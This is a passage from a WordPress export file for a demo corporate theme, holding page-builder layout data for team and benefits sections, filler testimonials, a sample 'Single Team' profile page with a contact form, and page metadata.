fa-pinterest-p","library":"fa-brand"},"_id":"a5da75d"},{"title":"Facebook","social_link":{"url":"#","is_external":"","nofollow":"","custom_attributes":""},"social_icon":{"value":"fab fa-facebook-f","library":"fa-brand"},"_id":"837324c"},{"title":"Twitter","social_link":{"url":"#","is_external":"","nofollow":"","custom_attributes":""},"social_icon":{"value":"fab fa-twitter","library":"fa-brand"},"_id":"cbcc844"}],"title_typography_typography":"custom","title_typography_font_size":{"unit":"px","size":22,"sizes":[]},"job_typography_typography":"custom","job_typography_font_size":{"unit":"px","size":13,"sizes":[]}},"elements":[],"widgetType":"imember"}],"isInner":true}],"isInner":true}],"isInner":false}],"isInner":false},{"id":"b3c9551","elType":"section","settings":{"layout":"full_width","gap":"no","content_position":"middle","structure":"20"},"elements":[{"id":"cfc4ff2","elType":"column","settings":{"_column_size":50,"_inline_size":null,"background_background":"classic","background_color":"#061E2F","_inline_size_tablet":100},"elements":[{"id":"6f8488f","elType":"section","settings":{"content_width":{"unit":"px","size":525,"sizes":[]},"css_classes":"mr_0","padding":{"unit":"px","top":"0","right":"70","bottom":"0","left":"0","isLinked":false},"padding_tablet":{"unit":"%","top":"10","right":"20","bottom":"10","left":"0","isLinked":false},"padding_mobile":{"unit":"px","top":"60","right":"0","bottom":"60","left":"0","isLinked":false}},"elements":[{"id":"4e25f9a","elType":"column","settings":{"_column_size":100,"_inline_size":null},"elements":[{"id":"a001cee","elType":"widget","settings":{"sub":"our benefits","title":"Entrust Your Project to  Our Specialists","title_color":"#FFFFFF","_padding":{"unit":"px","top":"0","right":"0","bottom":"25","left":"0","isLinked":false},"stitle_bg":"#4B83FC1A","title_typography_typography":"custom","title_typography_font_size_mobile":{"unit":"px","size":30,"sizes":[]},"is_highlight":"","stitle_typography_typography":"custom","stitle_typography_font_size":{"unit":"px","size":14,"sizes":[]},"subtitle_style":"is_line","stitle_color":"#FFFFFF","stitle_typography_font_weight":"600"},"elements":[],"widgetType":"iheading"},{"id":"6a5318a","elType":"widget","settings":{"editor":"<p>In healthy companies, changing directions or launching new projects means combining underlying strengths and capacities with new.<\/p>","text_color":"#CCCCCC","_padding":{"unit":"px","top":"0","right":"0","bottom":"38","left":"0","isLinked":false}},"elements":[],"widgetType":"text-editor"},{"id":"0ba065e","elType":"widget","settings":{"title":"marketing analysis","percent":{"unit":"%","size":60,"sizes":[]},"bg_color":"#3B3D48","title_color":"#FFFFFF","per_bg":"#3B3D48","_padding":{"unit":"px","top":"0","right":"0","bottom":"20","left":"0","isLinked":false},"_padding_tablet":{"unit":"px","top":"0","right":"0","bottom":"40","left":"0","isLinked":false},"lbar_color":"#55BB53"},"elements":[],"widgetType":"iprogress"},{"id":"1df2f14","elType":"widget","settings":{"title":"finance strategy","percent":{"unit":"%","size":80,"sizes":[]},"bg_color":"#3B3D48","title_color":"#FFFFFF","per_bg":"#3B3D48","_padding":{"unit":"px","top":"0","right":"0","bottom":"20","left":"0","isLinked":false},"_padding_tablet":{"unit":"px","top":"0","right":"0","bottom":"40","left":"0","isLinked":false},"lbar_color":"#55BB53"},"elements":[],"widgetType":"iprogress"},{"id":"24c3ac5","elType":"widget","settings":{"title":"business innovation","percent":{"unit":"%","size":58,"sizes":[]},"bg_color":"#3B3D48","title_color":"#FFFFFF","per_bg":"#3B3D48","lbar_color":"#55BB53"},"elements":[],"widgetType":"iprogress"}],"isInner":true}],"isInner":true}],"isInner":false},{"id":"337cb49","elType":"column","settings":{"_column_size":50,"_inline_size":null,"_inline_size_tablet":100,"padding_mobile":{"unit":"px","top":"0","right":"0","bottom":"0","left":"0","isLinked":false}},"elements":[{"id":"d6d5985","elType":"widget","settings":{"image":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/image1-team.jpg","id":699},"image_size":"full","_margin_mobile":{"unit":"px","top":"0","right":"-15","bottom":"0","left":"-15","isLinked":false}},"elements":[],"widgetType":"image"}],"isInner":false}],"isInner":false},{"id":"a9b5cf2","elType":"section","settings":{"background_position":"center center","background_repeat":"no-repeat","background_size":"cover","padding":{"unit":"px","top":"120","right":"0","bottom":"192","left":"0","isLinked":false},"padding_mobile":{"unit":"px","top":"60","right":"0","bottom":"140","left":"0","isLinked":false}},"elements":[{"id":"4e2afe0","elType":"column","settings":{"_column_size":100,"_inline_size":null},"elements":[{"id":"78c7db3","elType":"section","settings":{"structure":"30","padding":{"unit":"px","top":"0","right":"0","bottom":"40","left":"0","isLinked":false},"layout":"full_width"},"elements":[{"id":"e4b3144","elType":"column","settings":{"_column_size":33,"_inline_size":21,"_inline_size_tablet":10},"elements":[],"isInner":true},{"id":"7e32710","elType":"column","settings":{"_column_size":33,"_inline_size":57.33200000000000073896444519050419330596923828125,"_inline_size_tablet":80},"elements":[{"id":"5aa0738","elType":"widget","settings":{"sub":"testimonials","title":"What People Say About Us","header_size":"h3","align":"center","_padding":{"unit":"px","top":"0","right":"0","bottom":"20","left":"0","isLinked":false},"stitle_bg":"#4B83FC1A","title_typography_typography":"custom","title_typography_font_size_mobile":{"unit":"px","size":32,"sizes":[]},"is_highlight":"","stitle_typography_typography":"custom","stitle_typography_font_size":{"unit":"px","size":14,"sizes":[]},"stitle_color":"#95A2AC","stitle_typography_font_weight":"600"},"elements":[],"widgetType":"iheading"},{"id":"bf1cbf3","elType":"widget","settings":{"editor":"<p>We help you see the world differently, discover opportunities you may never have imagined and achieve results that bridge what is with what can be.<\/p>","align":"center"},"elements":[],"widgetType":"text-editor"}],"isInner":true},{"id":"d1cccc6","elType":"column","settings":{"_column_size":33,"_inline_size":21,"_inline_size_tablet":10},"elements":[],"isInner":true}],"isInner":true},{"id":"398c80a","elType":"widget","settings":{"testi_slider":[{"tcontent":"\u201cWe know a diverse workforce and an inclusive culture matters to our clients. Through philanthropy and employee volunteerism, we support the diverse communities where our employees live.\u201d\n\n","timage":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/testi1.png","id":2241},"tname":"Oliver Simson","tjob":"client of company","_id":"560686e"},{"tcontent":"\u201cWe know a diverse workforce and an inclusive culture matters to our clients. Through philanthropy and employee volunteerism, we support the diverse communities where our employees live.\u201d\n\n","timage":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/testi2.png","id":518},"tname":"Mary Grey","tjob":"client of company","_id":"18ebffe"},{"tcontent":"\u201cWe know a diverse workforce and an inclusive culture matters to our clients. Through philanthropy and employee volunteerism, we support the diverse communities where our employees live.\u201d\n\n","timage":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/testi3.png","id":519},"tname":"Samanta Fox","tjob":"client of company","_id":"25d98b7"},{"tcontent":"\u201cWe know a diverse workforce and an inclusive culture matters to our clients. Through philanthropy and employee volunteerism, we support the diverse communities where our employees live.\u201d\n\n","timage":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/testi1.png","id":2241},"tname":"Oliver Simson","tjob":"client of company","_id":"1180cad"},{"tcontent":"\u201cWe know a diverse workforce and an inclusive culture matters to our clients. Through philanthropy and employee volunteerism, we support the diverse communities where our employees live.\u201d\n\n","timage":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/testi2.png","id":518},"tname":"Mary Grey","tjob":"client of company","_id":"0f71845"},{"tcontent":"\u201cWe know a diverse workforce and an inclusive culture matters to our clients. Through philanthropy and employee volunteerism, we support the diverse communities where our employees live.\u201d\n\n","timage":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/testi3.png","id":519},"tname":"Samanta Fox","tjob":"client of company","_id":"2d0cde6"}],"tshow":"3","loop":"true"},"elements":[],"widgetType":"itestimonials"}],"isInner":false}],"isInner":false},{"id":"75d2d13","elType":"section","settings":{"content_width":{"unit":"px","size":1370,"sizes":[]},"margin":{"unit":"px","top":"-75","right":0,"bottom":"-75","left":0,"isLinked":false},"margin_tablet":{"unit":"px","top":"0","right":0,"bottom":"0","left":0,"isLinked":false},"z_index":1,"margin_mobile":{"unit":"px","top":"0","right":0,"bottom":"0","left":0,"isLinked":false},"background_background":"classic","padding_tablet":{"unit":"px","top":"0","right":"0","bottom":"120","left":"0","isLinked":false},"padding_mobile":{"unit":"px","top":"0","right":"0","bottom":"60","left":"0","isLinked":false}},"elements":[{"id":"b0228da","elType":"column","settings":{"_column_size":100,"_inline_size":null},"elements":[{"id":"3ce7b9f","elType":"section","settings":{"gap":"extended","content_position":"middle","structure":"20","background_background":"classic","background_color":"#55BB53","border_radius":{"unit":"px","top":"5","right":"5","bottom":"5","left":"5","isLinked":true},"box_shadow_box_shadow_type":"yes","box_shadow_box_shadow":{"horizontal":8,"vertical":8,"blur":30,"spread":0,"color":"rgba(0, 0, 0, 0.12)"},"padding":{"unit":"px","top":"50","right":"45","bottom":"50","left":"45","isLinked":false},"margin_tablet":{"unit":"px","top":"0","right":0,"bottom":"0","left":0,"isLinked":false},"padding_mobile":{"unit":"px","top":"40","right":"20","bottom":"40","left":"20","isLinked":false}},"elements":[{"id":"edc75ac","elType":"column","settings":{"_column_size":50,"_inline_size":18,"_inline_size_tablet":100,"margin_tablet":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false}},"elements":[{"id":"77abe94","elType":"widget","settings":{"image":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/04_Full_White.svg","id":1956},"image_size":"full","align":"left","width":{"unit":"px","size":140,"sizes":[]}},"elements":[],"widgetType":"image"}],"isInner":true},{"id":"dbe6a08","elType":"column","settings":{"_column_size":50,"_inline_size":82,"_inline_size_tablet":100},"elements":[{"id":"fd0c80a","elType":"widget","settings":{"cf7":"741","_background_background":"classic","_border_radius":{"unit":"px","top":"5","right":"5","bottom":"5","left":"5","isLinked":true},"_border_radius_tablet":{"unit":"px","top":"0","right":"0","bottom":"0","left":"0","isLinked":false}},"elements":[],"widgetType":"ictf7"}],"isInner":true}],"isInner":true}],"isInner":false}],"isInner":false}]]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[pheader_bg_image]]></wp:meta_key>
		<wp:meta_value><![CDATA[691]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[select_footer]]></wp:meta_key>
		<wp:meta_value><![CDATA[300]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_controls_usage]]></wp:meta_key>
		<wp:meta_value><![CDATA[a:9:{s:6:"column";a:3:{s:5:"count";i:22;s:15:"control_percent";i:0;s:8:"controls";a:3:{s:6:"layout";a:1:{s:6:"layout";a:2:{s:12:"_inline_size";i:22;s:19:"_inline_size_tablet";i:18;}}s:5:"style";a:1:{s:13:"section_style";a:2:{s:21:"background_background";i:1;s:16:"background_color";i:1;}}s:8:"advanced";a:1:{s:16:"section_advanced";a:2:{s:14:"padding_mobile";i:1;s:13:"margin_tablet";i:1;}}}}s:8:"iheading";a:3:{s:5:"count";i:3;s:15:"control_percent";i:5;s:8:"controls";a:3:{s:7:"content";a:1:{s:15:"content_section";a:4:{s:3:"sub";i:3;s:5:"title";i:3;s:11:"header_size";i:2;s:5:"align";i:2;}}s:8:"advanced";a:1:{s:14:"_section_style";a:1:{s:8:"_padding";i:3;}}s:5:"style";a:1:{s:13:"style_section";a:9:{s:9:"stitle_bg";i:3;s:27:"title_typography_typography";i:3;s:33:"title_typography_font_size_mobile";i:3;s:28:"stitle_typography_typography";i:3;s:27:"stitle_typography_font_size";i:3;s:12:"stitle_color";i:3;s:29:"stitle_typography_font_weight";i:3;s:11:"title_color";i:1;s:14:"subtitle_style";i:1;}}}}s:11:"text-editor";a:3:{s:5:"count";i:3;s:15:"control_percent";i:1;s:8:"controls";a:3:{s:7:"content";a:1:{s:14:"section_editor";a:1:{s:6:"editor";i:3;}}s:5:"style";a:1:{s:13:"section_style";a:2:{s:5:"align";i:2;s:10:"text_color";i:1;}}s:8:"advanced";a:1:{s:14:"_section_style";a:1:{s:8:"_padding";i:1;}}}}s:7:"section";a:3:{s:5:"count";i:10;s:15:"control_percent";i:2;s:8:"controls";a:3:{s:6:"layout";a:2:{s:17:"section_structure";a:1:{s:9:"structure";i:6;}s:14:"section_layout";a:4:{s:6:"layout";i:5;s:3:"gap";i:4;s:13:"content_width";i:2;s:16:"content_position";i:2;}}s:8:"advanced";a:1:{s:16:"section_advanced";a:8:{s:7:"padding";i:7;s:14:"padding_mobile";i:6;s:11:"css_classes";i:1;s:14:"padding_tablet";i:2;s:13:"margin_tablet";i:2;s:6:"margin";i:1;s:7:"z_index";i:1;s:13:"margin_mobile";i:1;}}s:5:"style";a:2:{s:18:"section_background";a:5:{s:19:"background_position";i:2;s:17:"background_repeat";i:2;s:15:"background_size";i:2;s:21:"background_background";i:2;s:16:"background_color";i:1;}s:14:"section_border";a:3:{s:13:"border_radius";i:1;s:26:"box_shadow_box_shadow_type";i:1;s:21:"box_shadow_box_shadow";i:1;}}}}s:7:"imember";a:3:{s:5:"count";i:8;s:15:"control_percent";i:3;s:8:"controls";a:3:{s:7:"content";a:1:{s:15:"content_section";a:4:{s:12:"member_image";i:8;s:11:"member_name";i:7;s:12:"member_extra";i:6;s:12:"social_share";i:8;}}s:8:"advanced";a:1:{s:14:"_section_style";a:2:{s:15:"_padding_tablet";i:4;s:15:"_padding_mobile";i:2;}}s:5:"style";a:1:{s:10:"info_style";a:4:{s:27:"title_typography_typography";i:8;s:26:"title_typography_font_size";i:8;s:25:"job_typography_typography";i:8;s:24:"job_typography_font_size";i:8;}}}}s:9:"iprogress";a:3:{s:5:"count";i:3;s:15:"control_percent";i:2;s:8:"controls";a:3:{s:7:"content";a:1:{s:15:"content_section";a:2:{s:5:"title";i:3;s:7:"percent";i:3;}}s:5:"style";a:2:{s:17:"bar_style_section";a:2:{s:8:"bg_color";i:3;s:10:"lbar_color";i:3;}s:18:"style_text_section";a:2:{s:11:"title_color";i:3;s:6:"per_bg";i:3;}}s:8:"advanced";a:1:{s:14:"_section_style";a:2:{s:8:"_padding";i:2;s:15:"_padding_tablet";i:2;}}}}s:5:"image";a:3:{s:5:"count";i:2;s:15:"control_percent";i:2;s:8:"controls";a:3:{s:7:"content";a:1:{s:13:"section_image";a:3:{s:5:"image";i:2;s:10:"image_size";i:2;s:5:"align";i:1;}}s:8:"advanced";a:1:{s:14:"_section_style";a:1:{s:14:"_margin_mobile";i:1;}}s:5:"style";a:1:{s:19:"section_style_image";a:1:{s:5:"width";i:1;}}}}s:13:"itestimonials";a:3:{s:5:"count";i:1;s:15:"control_percent";i:1;s:8:"controls";a:1:{s:7:"content";a:1:{s:20:"section_testimonials";a:3:{s:12:"testi_slider";i:1;s:5:"tshow";i:1;s:4:"loop";i:1;}}}}s:5:"ictf7";a:3:{s:5:"count";i:1;s:15:"control_percent";i:2;s:8:"controls";a:2:{s:7:"content";a:1:{s:15:"section_content";a:1:{s:3:"cf7";i:1;}}s:8:"advanced";a:2:{s:19:"_section_background";a:1:{s:22:"_background_background";i:1;}s:15:"_section_border";a:2:{s:14:"_border_radius";i:1;s:21:"_border_radius_tablet";i:1;}}}}}]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>Single Team</title>
		<link>http://wpdemo.archiwp.com/maxbizz-corporate/our-team/single-team/</link>
		<pubDate>Thu, 10 Sep 2020 02:50:23 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">http://wpdemo.archiwp.com/maxbizz/?page_id=711</guid>
		<description></description>
		<content:encoded><![CDATA[<img width="530" height="500" src="https://maxbizz.s3.amazonaws.com/images/image1-single-team.jpg" alt="" loading="lazy" srcset="https://maxbizz.s3.amazonaws.com/images/image1-single-team.jpg 530w, https://maxbizz.s3.amazonaws.com/images/image1-single-team-1-300x283.jpg 300w" sizes="(max-width: 530px) 100vw, 530px" />											
			<h3>Peter Perish</h3>		
			<h6>chief business project</h6>		
		<ul><li>Department: Business Department</li><li>Experience: 15 Years</li><li>Email: perish.maxbizz@mail.com</li><li>Phone: +1-800-456-478-23</li><li>Fax: +1-800-456-478-24</li></ul>		
					<a target="_blank" rel="noopener noreferrer">
						Twitter
											</a>
					<a target="_blank" rel="noopener noreferrer">
						Facebook-f
											</a>
					<a target="_blank" rel="noopener noreferrer">
						Google-plus-g
											</a>
					<a target="_blank" rel="noopener noreferrer">
						Pinterest-p
											</a>
			<h5>My Biography</h5>		
		<p>A vast majority of the app marketers mainly concentrate on the post-launch app marketing techniques and measures while completely missing on the pre-launch campaign. This prevents the app to create buzz and hype just around the time when the app is launched. As and when you launch the app, already a considerable number of people should expectantly look forward to your app and this requires long-drawn marketing efforts leading up to the app launch event. To create pre-launch buzz and hype about the app a mobile app development company has an array of marketing options like social media campaign, search engine ads, video ads, email campaigns, etc. Apart from online options, you can also reach out to the wider audience with traditional marketing options like outdoor ads, print ads, media ads, and promotional events.</p>		
					75				
			<h6>marketing analysis</h6>		
					65				
			<h6>business innovation</h6>		
					90				
			<h6>finance strategy</h6>		
					45				
			<h6>corporate management</h6>		
			<h5>My Soft & Hard Skills</h5>		
		<p>Just as a retail business in real life is remembered not just for its product offerings but also because of its services, support, and customer-friendliness, an app that offers a helpful customer support system for its valued users enjoy more traction and engagement than other apps. Great brands all over the globe enjoy appreciation and popularity because of their customer-friendly support and services.</p>		
<p role="status" aria-live="polite" aria-atomic="true"></p> <ul></ul>
<form action="/maxbizz-corporate/wp-admin/admin-ajax.php#wpcf7-f736-o1" method="post" novalidate="novalidate" data-status="init">
<input type="hidden" name="_wpcf7" value="736" />
<input type="hidden" name="_wpcf7_version" value="5.3" />
<input type="hidden" name="_wpcf7_locale" value="en_US" />
<input type="hidden" name="_wpcf7_unit_tag" value="wpcf7-f736-o1" />
<input type="hidden" name="_wpcf7_container_post" value="0" />
<input type="hidden" name="_wpcf7_posted_data_hash" value="" />
<h4>Contact Me</h4>
<p><input type="text" name="your-name" value="" size="40" aria-required="true" aria-invalid="false" placeholder="Your Name *" /></p>
<p><input type="email" name="your-email" value="" size="40" aria-required="true" aria-invalid="false" placeholder="Your Email *" /></p>
<p><input type="text" name="your-site" value="" size="40" aria-invalid="false" placeholder="Website" /></p>
<p><textarea name="your-message" cols="40" rows="10" aria-invalid="false" placeholder="Message..."></textarea></p>
<p><button type="submit">Send a message</button>
</form>]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>711</wp:post_id>
		<wp:post_date><![CDATA[2020-09-10 02:50:23]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-09-10 02:50:23]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[closed]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[single-team]]></wp:post_name>
		<wp:status><![CDATA[publish]]></wp:status>
		<wp:post_parent>690</wp:post_parent>
		<wp:menu_order>0</wp:menu_order>
		<wp:post_type><![CDATA[page]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
														<wp:postmeta>
		<wp:meta_key><![CDATA[_edit_last]]></wp:meta_key>
		<wp:meta_value><![CDATA[1]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[page_layout]]></wp:meta_key>
		<wp:meta_value><![CDATA[full-content]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[pheader_switch]]></wp:meta_key>
		<wp:meta_value><![CDATA[1]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[is_trans]]></wp:meta_key>
		<wp:meta_value><![CDATA[default]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[slide_template]]></wp:meta_key>
		<wp:meta_value><![CDATA[default]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[rs_page_bg_color]]></wp:meta_key>
		<wp:meta_value><![CDATA[#ffffff]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_edit_mode]]></wp:meta_key>
		<wp:meta_value><![CDATA[builder]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_template_type]]></wp:meta_key>
		<wp:meta_value><![CDATA[wp-page]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_version]]></wp:meta_key>
		<wp:meta_value><![CDATA[3.0.13]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_page_template]]></wp:meta_key>
		<wp:meta_value><![CDATA[default]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_data]]></wp:meta_key>
		<wp:meta_value><![CDATA[[{"id":"b501399","elType":"section","settings":{"gap":"extended","padding":{"unit":"px","top":"90","right":"0","bottom":"110","left":"0","isLinked":false},"padding_mobile":{"unit":"px","top":"60","right":"0","bottom":"60","left":"0","isLinked":false}},"elements":[{"id":"6365e43","elType":"column","settings":{"_column_size":100,"_inline_size":null},"elements":[{"id":"4b4c82c","elType":"section","settings":{"layout":"full_width","gap":"extended","structure":"20","content_position":"middle","box_shadow_box_shadow_type":"yes","box_shadow_box_shadow":{"horizontal":0,"vertical":0,"blur":30,"spread":0,"color":"rgba(0, 0, 0, 0.12)"},"padding_mobile":{"unit":"px","top":"0","right":"0","bottom":"20","left":"0","isLinked":false}},"elements":[{"id":"fcac4d4","elType":"column","settings":{"_column_size":50,"_inline_size":null,"_inline_size_tablet":100,"margin_tablet":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false}},"elements":[{"id":"98f528e","elType":"widget","settings":{"image":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/image1-single-team.jpg","id":713},"image_size":"full","align":"left","width_tablet":{"unit":"%","size":100,"sizes":[]}},"elements":[],"widgetType":"image"}],"isInner":true},{"id":"1070f44","elType":"column","settings":{"_column_size":50,"_inline_size":null,"_inline_size_tablet":100,"margin_tablet":{"unit":"px","top":"0","right":"30","bottom":"30","left":"30","isLinked":false}},"elements":[{"id":"bfb6219","elType":"widget","settings":{"title":"Peter Perish","header_size":"h3","_padding":{"unit":"px","top":"0","right":"0","bottom":"15","left":"0","isLinked":false}},"elements":[],"widgetType":"heading"},{"id":"77b067d","elType":"widget","settings":{"title":"chief business project","header_size":"h6","title_color":"#55BB53","typography_typography":"custom","typography_font_family":"Inter","typography_font_size":{"unit":"px","size":14,"sizes":[]},"typography_font_weight":"600","typography_text_transform":"uppercase","_padding":{"unit":"px","top":"0","right":"0","bottom":"28","left":"0","isLinked":false}},"elements":[],"widgetType":"heading"},{"id":"e4d0805","elType":"widget","settings":{"editor":"<ul class=\"member-info\"><li><span class=\"text-dark\">Department:<\/span> Business Department<\/li><li><span class=\"text-dark\">Experience:<\/span> 15 Years<\/li><li><span class=\"text-dark\">Email: <\/span>perish.maxbizz@mail.com<\/li><li><span class=\"text-dark\">Phone: <\/span>+1-800-456-478-23<\/li><li><span class=\"text-dark\">Fax: <\/span>+1-800-456-478-24<\/li><\/ul>"},"elements":[],"widgetType":"text-editor"},{"id":"1453173","elType":"widget","settings":{"social_icon_list":[{"social_icon":{"value":"fab fa-twitter","library":"fa-brands"},"_id":"049712d","item_icon_color":"custom","item_icon_primary_color":"#51AFF7","item_icon_secondary_color":"#FFFFFF"},{"social_icon":{"value":"fab fa-facebook-f","library":"fa-brands"},"_id":"030f11b","item_icon_color":"custom","item_icon_primary_color":"#284BAF","item_icon_secondary_color":"#FFFFFF"},{"social_icon":{"value":"fab fa-google-plus-g","library":"fa-brands"},"_id":"9c6b4b3","item_icon_color":"custom","item_icon_primary_color":"#E03609","item_icon_secondary_color":"#FFFFFF"},{"social_icon":{"value":"fab fa-pinterest-p","library":"fa-brands"},"_id":"b977f7f","item_icon_color":"custom","item_icon_primary_color":"#E40000","item_icon_secondary_color":"#FFFFFF"}],"icon_color":"custom","icon_primary_color":"rgba(26, 26, 26, 0)","icon_secondary_color":"#1A1A1A","icon_size":{"unit":"px","size":14,"sizes":[]},"icon_spacing":{"unit":"px","size":15,"sizes":[]},"image_border_border":"solid","image_border_width":{"unit":"px","top":"1","right":"1","bottom":"1","left":"1","isLinked":true},"image_border_color":"rgba(255, 255, 255, 0)","border_radius":{"unit":"px","top":"50","right":"50","bottom":"50","left":"50","isLinked":true},"hover_border_color":"rgba(255, 255, 255, 0)","_padding_mobile":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false},"columns":"4","align":"left"},"elements":[],"widgetType":"social-icons"}],"isInner":true}],"isInner":true},{"id":"a742530","elType":"widget","settings":{"title":"My Biography","header_size":"h5","_padding":{"unit":"px","top":"60","right":"0","bottom":"25","left":"0","isLinked":false},"_padding_mobile":{"unit":"px","top":"40","right":"0","bottom":"20","left":"0","isLinked":false}},"elements":[],"widgetType":"heading"},{"id":"ef6bdc8","elType":"widget","settings":{"editor":"<p>A vast majority of the app marketers mainly concentrate on the post-launch app marketing techniques and measures while completely missing on the pre-launch campaign. This prevents the app to create buzz and hype just around the time when the app is launched. As and when you launch the app, already a considerable number of people should expectantly look forward to your app and this requires long-drawn marketing efforts leading up to the app launch event. To create pre-launch buzz and hype about the app <span style=\"color: #55bb53;\">a mobile app development company<\/span> has an array of marketing options like social media campaign, search engine ads, video ads, email campaigns, etc. Apart from online options, you can also reach out to the wider audience with traditional marketing options like outdoor ads, print ads, media ads, and promotional events.<\/p>","_padding":{"unit":"px","top":"0","right":"0","bottom":"50","left":"0","isLinked":false}},"elements":[],"widgetType":"text-editor"},{"id":"984c88f","elType":"section","settings":{"layout":"full_width","gap":"extended","structure":"40","padding":{"unit":"px","top":"0","right":"0","bottom":"60","left":"0","isLinked":false},"padding_mobile":{"unit":"px","top":"0","right":"0","bottom":"50","left":"0","isLinked":false}},"elements":[{"id":"865ab3e","elType":"column","settings":{"_column_size":25,"_inline_size":null,"_inline_size_mobile":100,"_inline_size_tablet":50},"elements":[{"id":"7bbffe7","elType":"widget","settings":{"bar_style":"circle","title":"marketing analysis","percent":{"unit":"%","size":75,"sizes":[]},"_padding_mobile":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false},"_padding_tablet":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false},"bar_color":"#55BB53","title_typography_typography":"custom","title_typography_font_size":{"unit":"px","size":16,"sizes":[]}},"elements":[],"widgetType":"iprogress"}],"isInner":true},{"id":"da47a10","elType":"column","settings":{"_column_size":25,"_inline_size":null,"_inline_size_mobile":100,"_inline_size_tablet":50},"elements":[{"id":"a81434a","elType":"widget","settings":{"bar_style":"circle","title":"business innovation","percent":{"unit":"%","size":65,"sizes":[]},"_padding_mobile":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false},"_padding_tablet":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false},"bar_color":"#55BB53","title_typography_typography":"custom","title_typography_font_size":{"unit":"px","size":16,"sizes":[]}},"elements":[],"widgetType":"iprogress"}],"isInner":true},{"id":"1541169","elType":"column","settings":{"_column_size":25,"_inline_size":null,"_inline_size_mobile":100,"_inline_size_tablet":50},"elements":[{"id":"ca57b45","elType":"widget","settings":{"bar_style":"circle","title":"finance strategy","percent":{"unit":"%","size":90,"sizes":[]},"_padding_mobile":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false},"bar_color":"#55BB53","title_typography_typography":"custom","title_typography_font_size":{"unit":"px","size":16,"sizes":[]}},"elements":[],"widgetType":"iprogress"}],"isInner":true},{"id":"c75fefb","elType":"column","settings":{"_column_size":25,"_inline_size":null,"_inline_size_mobile":100,"_inline_size_tablet":50},"elements":[{"id":"bdf3219","elType":"widget","settings":{"bar_style":"circle","title":"corporate management","percent":{"unit":"%","size":45,"sizes":[]},"bar_color":"#55BB53","title_typography_typography":"custom","title_typography_font_size":{"unit":"px","size":16,"sizes":[]}},"elements":[],"widgetType":"iprogress"}],"isInner":true}],"isInner":true},{"id":"17353e6","elType":"widget","settings":{"title":"My Soft & Hard Skills","header_size":"h5","_padding":{"unit":"px","top":"0","right":"0","bottom":"25","left":"0","isLinked":false},"_padding_mobile":{"unit":"px","top":"0","right":"0","bottom":"20","left":"0","isLinked":false}},"elements":[],"widgetType":"heading"},{"id":"318c138","elType":"widget","settings":{"editor":"<p>Just as a retail business in real life is remembered not just for its product offerings but also because of its services, support, and customer-friendliness, an app that offers a helpful customer support system for its valued users enjoy more traction and engagement than other apps. Great brands all over the globe enjoy appreciation and popularity because of their customer-friendly support and services.<\/p>","_padding":{"unit":"px","top":"0","right":"0","bottom":"70","left":"0","isLinked":false},"_padding_mobile":{"unit":"px","top":"0","right":"0","bottom":"50","left":"0","isLinked":false}},"elements":[],"widgetType":"text-editor"},{"id":"2b3ff2b","elType":"widget","settings":{"cf7":"736","_padding":{"unit":"px","top":"60","right":"60","bottom":"60","left":"60","isLinked":true},"_padding_mobile":{"unit":"px","top":"30","right":"20","bottom":"30","left":"20","isLinked":false},"_background_background":"classic","_background_color":"#FFFFFF","_border_radius":{"unit":"px","top":"5","right":"5","bottom":"5","left":"5","isLinked":true},"_box_shadow_box_shadow_type":"yes","_box_shadow_box_shadow":{"horizontal":0,"vertical":0,"blur":30,"spread":0,"color":"rgba(0, 0, 0, 0.12)"}},"elements":[],"widgetType":"ictf7"}],"isInner":false}],"isInner":false}]]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[pheader_bg_image]]></wp:meta_key>
		<wp:meta_value><![CDATA[691]]></wp:meta_value>
		</wp:postmeta>
